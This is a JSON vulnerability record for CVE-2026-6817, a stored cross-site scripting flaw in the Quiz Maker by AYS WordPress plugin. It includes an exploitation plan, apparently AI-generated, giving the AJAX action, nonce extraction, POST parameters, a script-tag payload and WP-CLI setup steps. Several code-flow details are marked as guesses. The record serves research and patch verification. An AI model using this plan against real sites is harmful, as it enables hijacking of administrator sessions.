[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fWlwSiyAovF5SulbGyAxwCnyNuwDeyowILDVD078vmTw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":27,"research_verified":28,"research_rounds_completed":29,"research_plan":30,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":31,"research_started_at":32,"research_completed_at":33,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":28,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":28,"source_links":34},"CVE-2026-6817","quiz-maker-by-ays-unauthenticated-stored-cross-site-scripting-via-ratereason","Quiz Maker by AYS \u003C= 6.7.1.29 - Unauthenticated Stored Cross-Site Scripting via 'rate_reason'","The Quiz Maker by AYS plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'rate_reason' parameter in all versions up to, and including, 6.7.1.29 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","quiz-maker",null,"\u003C=6.7.1.29","6.7.1.30","medium",5.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:N\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-01 21:36:24","2026-05-02 11:16:12",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ffa995fa9-5fb1-434a-bf88-c60e986c45eb?source=api-prod",1,[22,23,24,25,26],"README.txt","includes\u002Flists\u002Fclass-quiz-maker-all-reviews-list-table.php","includes\u002Flists\u002Fclass-quiz-maker-results-list-table.php","public\u002Fclass-quiz-maker-public.php","quiz-maker.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-6817\n\n## 1. Vulnerability Summary\nThe **Quiz Maker by AYS** plugin (\u003C= 6.7.1.29) contains an unauthenticated stored cross-site scripting (XSS) vulnerability. The plugin allows users (including unauthenticated guests) to submit ratings and feedback (\"reasons\") upon completing a quiz. The `rate_reason` parameter is stored in the database without sufficient sanitization and is later rendered in the WordPress administrative dashboard (the \"Reviews\" list) without proper escaping. \n\nAn attacker can inject arbitrary JavaScript, which will execute in the context of an administrator viewing the quiz reviews, potentially leading to session hijacking or the creation of unauthorized administrative accounts.\n\n## 2. Attack Vector Analysis\n*   **Endpoint**: `wp-admin\u002Fadmin-ajax.php`\n*   **AJAX Action**: `ays_finish_quiz` (Commonly used for quiz completion and rating submission in this plugin).\n*   **Vulnerable Parameter**: `rate_reason`\n*   **Authentication**: None required (Unauthenticated).\n*   **Preconditions**: At least one quiz must be published and accessible via a shortcode.\n*   **Sink**: The injected script is executed when an admin visits the \"Reviews\" page: `wp-admin\u002Fadmin.php?page=ays_quiz_all_reviews_quiz_maker`.\n\n## 3. Code Flow\n1.  **Submission (Public)**:\n    *   The `Quiz_Maker_Public` class (in `public\u002Fclass-quiz-maker-public.php`) registers AJAX handlers for quiz completion.\n    *   The handler (likely `ays_finish_quiz`) retrieves `$_POST['rate_reason']`.\n    *   The data is stored in the `{$wpdb->prefix}aysquiz_reviews` table (or similar results table) via a database insert operation.\n2.  **Display (Admin)**:\n    *   An administrator navigates to the \"Reviews\" list.\n    *   The `All_Reviews_List_Table` class in `includes\u002Flists\u002Fclass-quiz-maker-all-reviews-list-table.php` is instantiated to display the records.\n    *   The `rate_reason` value is retrieved from the database.\n    *   The value is echoed into the table row, typically within a `column_default` or specific `column_rate_reason` method (not fully shown in snippet, but implied by the `WP_List_Table` implementation), without using `esc_html()` or `wp_kses()`.\n\n## 4. Nonce Acquisition Strategy\nThe plugin enqueues public scripts and localizes a nonce for AJAX operations.\n\n1.  **Identify Shortcode**: The main shortcode is `[ays_quiz id='QUIZ_ID']` (verified from `README.txt`).\n2.  **Creation**: Use WP-CLI to create a test quiz and a page containing its shortcode.\n3.  **Extraction**:\n    *   Navigate to the page.\n    *   The plugin localizes data into a JavaScript object. Based on the plugin's structure, the object is typically named `ays_quiz_ajax`.\n    *   **JS Variable**: `window.ays_quiz_ajax`\n    *   **Nonce Key**: `nonce`\n    *   **Action String**: The nonce is generated via `wp_create_nonce('ays_quiz_ajax_nonce')`.\n\n## 5. Exploitation Strategy\n### Step 1: Target Identification\nDetermine a valid Quiz ID. If no quiz exists, one must be created.\n\n### Step 2: Obtain Nonce\nAccess a page where the quiz is rendered and extract the `ays_quiz_ajax.nonce` value.\n\n### Step 3: Inject Payload\nSend an unauthenticated POST request to `admin-ajax.php`.\n\n**Request Details**:\n*   **URL**: `http:\u002F\u002FTARGET_URL\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method**: `POST`\n*   **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body Parameters**:\n    *   `action`: `ays_finish_quiz`\n    *   `quiz_id`: `[ID_OF_CREATED_QUIZ]`\n    *   `ays_quiz_questions_ids`: `[ID_OF_A_QUESTION]` (often required for valid completion)\n    *   `ays_quiz_nonce`: `[EXTRACTED_NONCE]`\n    *   `ays_quiz_rate`: `5`\n    *   `rate_reason`: `\u003Cscript>alert(document.domain);\u003C\u002Fscript>`\n\n### Step 4: Trigger Execution\nLog in as an Administrator and navigate to the Reviews page.\n\n## 6. Test Data Setup\n1.  **Create Quiz**:\n    ```bash\n    # Create a simple quiz via WP-CLI (if possible) or use a known ID\n    # Note: AYS Quiz Maker stores data in custom tables, so we use wp_eval to insert a dummy quiz\n    wp eval \"global \\$wpdb; \\$wpdb->insert(\\\"{\\$wpdb->prefix}aysquiz_quizes\\\", array('title' => 'Exploit Test', 'status' => 'publish')); echo \\$wpdb->insert_id;\"\n    ```\n2.  **Create Page**:\n    ```bash\n    wp post create --post_type=page --post_title=\"Quiz Page\" --post_status=publish --post_content=\"[ays_quiz id='1']\"\n    ```\n\n## 7. Expected Results\n*   The AJAX submission should return a JSON success message (e.g., `{\"status\":true,...}`).\n*   When the admin visits `wp-admin\u002Fadmin.php?page=ays_quiz_all_reviews_quiz_maker`, the browser will execute `alert(document.domain)`.\n\n## 8. Verification Steps\n1.  **Check Database**:\n    ```bash\n    wp db query \"SELECT rate_reason FROM wp_aysquiz_reviews ORDER BY id DESC LIMIT 1;\"\n    ```\n    Confirm the `rate_reason` contains the raw `\u003Cscript>` tag.\n2.  **Check Admin UI (Manual\u002FAutomated)**:\n    Use `browser_navigate` as an admin to the reviews page and check for the presence of the alert or the unescaped string in the HTML source.\n\n## 9. Alternative Approaches\nIf `ays_finish_quiz` is too complex or requires valid answers, attempt a direct rating action if available:\n*   **Action**: `ays_quiz_rate`\n*   **Payload**: Send `rate_reason` and `quiz_id` to this action.\n*   **JS Check**: Inspect `public\u002Fjs\u002Fquiz-maker-public.js` (if accessible) to see exactly how the \"Rating\" submit button sends data to `admin-ajax.php`. Look for `jQuery.ajax` calls involving `rate_reason`.","gemini-3-flash-preview","2026-05-04 17:04:17","2026-05-04 17:04:45",{"type":35,"vulnerable_version":36,"fixed_version":11,"vulnerable_browse":37,"vulnerable_zip":38,"fixed_browse":39,"fixed_zip":40,"all_tags":41},"plugin","6.7.1.29","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fquiz-maker\u002Ftags\u002F6.7.1.29","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquiz-maker.6.7.1.29.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fquiz-maker\u002Ftags\u002F6.7.1.30","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquiz-maker.6.7.1.30.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fquiz-maker\u002Ftags"]